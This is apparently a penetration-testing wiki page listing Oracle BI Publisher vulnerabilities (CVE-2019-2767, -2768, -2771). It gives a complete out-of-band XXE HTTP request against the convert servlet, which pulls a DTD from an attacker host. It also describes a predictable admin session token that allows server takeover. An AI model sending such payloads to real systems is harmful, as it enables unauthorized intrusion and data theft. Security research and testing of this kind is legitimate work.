search

ORACLE BI

Exploits

https://github.com/vah13/Oracle-BI-bugsarrow-up-right

hashtag
CVE-2019-2767

  • Subject: XXE IN CONVERT SERVLET

  • CVSSv3.0 Base Score: 7.2

  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//ehost%3a1337/ev.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflat
Connection: close
Upgrade-Insecure-Requests: 1

hashtag
CVE-2019-2768

  • Subject: ACCESS TO ADMIN SERVICES, SESSION GENERATION ERROR

  • CVSSv3.0 Base Score: 7.5

  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Oracle BI has xmlpserver which the administrator is using for configuring the server. To use the xmlpserver services, the administrator have to create a session using createSession function.

I've tried to generate a session several times and I've got the same value in the response. I changed the password and but again I got the same response.

WHAT? It seems that the session consists of two public datas (username and server ID). In order to check it I wrote a simple code and here is what I got as a result.

webarrow-up-right

Example of plugin deploy request

So, as you can see , if someone knows 2 public data of the server he can take it under control.

hashtag
CVE-2019-2771

  • Subject: BIP BYPASS FONT UPLOAD

  • CVSSv3.0 Base Score: 8.2

  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L

webarrow-up-right

uploadarrow-up-right

write filearrow-up-right

file on the systemarrow-up-right

PreviousCKEditor 4NextSAP Pentest

Last updated